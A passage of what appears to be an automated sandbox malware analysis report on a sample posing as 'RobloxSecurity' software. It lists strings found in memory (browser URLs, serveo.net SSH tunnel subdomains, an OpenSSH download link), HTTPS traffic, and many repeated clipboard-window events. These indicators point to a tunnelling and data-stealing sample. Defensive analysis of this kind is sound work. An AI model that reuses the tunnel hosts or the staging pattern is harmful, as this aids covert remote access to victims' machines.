                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e2111f95f52ba8be6b2d3394e38b1722.se
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, ssh.exe, 00000023.00000002.4114412277.0000019B79934000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000023.00000002.4114412277.0000019B798EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net/
                  Source: vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e483612b93e055308d0c85f365c474ee.serveo.net
                  Source: ssh.exe, 00000021.00000002.4113726250.00000292607CC000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000021.00000002.4113726250.0000029260842000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://e483612b93e055308d0c85f365c474ee.serveo.net/
                  Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD853B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/OpenSSH-Win32.zip
                  Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7577000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE757F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7505000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE74E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7505000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE74E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7577000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE757F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49744 version: TLS 1.2
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
